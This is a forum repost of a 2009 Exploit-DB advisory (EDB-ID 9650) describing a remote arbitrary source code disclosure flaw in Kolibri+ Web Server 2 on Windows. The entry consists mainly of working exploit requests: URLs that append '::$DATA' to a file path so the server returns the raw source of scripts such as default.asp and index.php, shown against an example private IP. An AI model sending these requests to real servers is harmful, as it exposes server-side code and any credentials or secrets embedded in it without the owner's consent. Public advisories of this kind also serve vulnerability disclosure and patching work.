Exploit Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9650
Проверка EDB
  1. Пройдено
Автор
DR_IDE
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2009-09-11
Код:
#################################################################################
#                                                                        	#
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure 		#
# aka:		More fun with Kolibri+ 2 webserver 		         	#
# Found By:	Dr_IDE								#
# Tested On:	Windows XPSP3                                            	#
#                                                                        	#
#################################################################################

- Description -

Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available. 

This vulnerability is similar to the one reported earlier by Skull-HacKeR.

Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

# milw0rm.com [2009-09-11]
 
Источник
www.exploit-db.com

Похожие темы